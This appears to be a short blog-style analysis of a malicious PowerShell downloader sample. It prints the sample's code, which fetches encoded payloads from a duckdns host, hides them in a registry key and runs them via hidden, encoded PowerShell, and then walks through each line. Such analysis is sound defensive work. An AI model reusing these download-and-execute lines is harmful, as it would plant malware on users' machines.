Analysis Malicious Powershell Part 2

By

 

In this article, we will analyze another PowerShell file that is used to download and run malware.

Sample Link : https://bazaar.abuse.ch/sample/cf0aea3ef14b4587489a9163ee8840f2e388fd0f928f9d5f60d31582a69a9d1f/


Malicious Powershell Code : 

#$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"
#$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1" 
#$webClient = New-Object System.Net.WebClient
#$base64Code = $webClient.DownloadString($url)
#Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String
#$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));
Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=


Malicious Powershell Analysis: 

1- Malware Developer declared a variable as url to download encrypted base64 file : #$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt" .

2- Malware Developer declared a variable as url to download encrypted base64 Powershell file : #$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1"  .

3- Malware Developer setup the webclient object to interact with a url's : #$webClient = New-Object System.Net.WebClient .

4- Malware Developer declare a variable to download the encrypted base64 and ps1 file : #$base64Code = $webClient.DownloadString($url). 

5- Malware Developer store encoded base64 into the registry key : #Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String.

6- Malware Developer Download encrypted base64 file : #$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));

7- Malware Developer execute the encoded base64 code through a Powershell : Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=



Comments

Post a Comment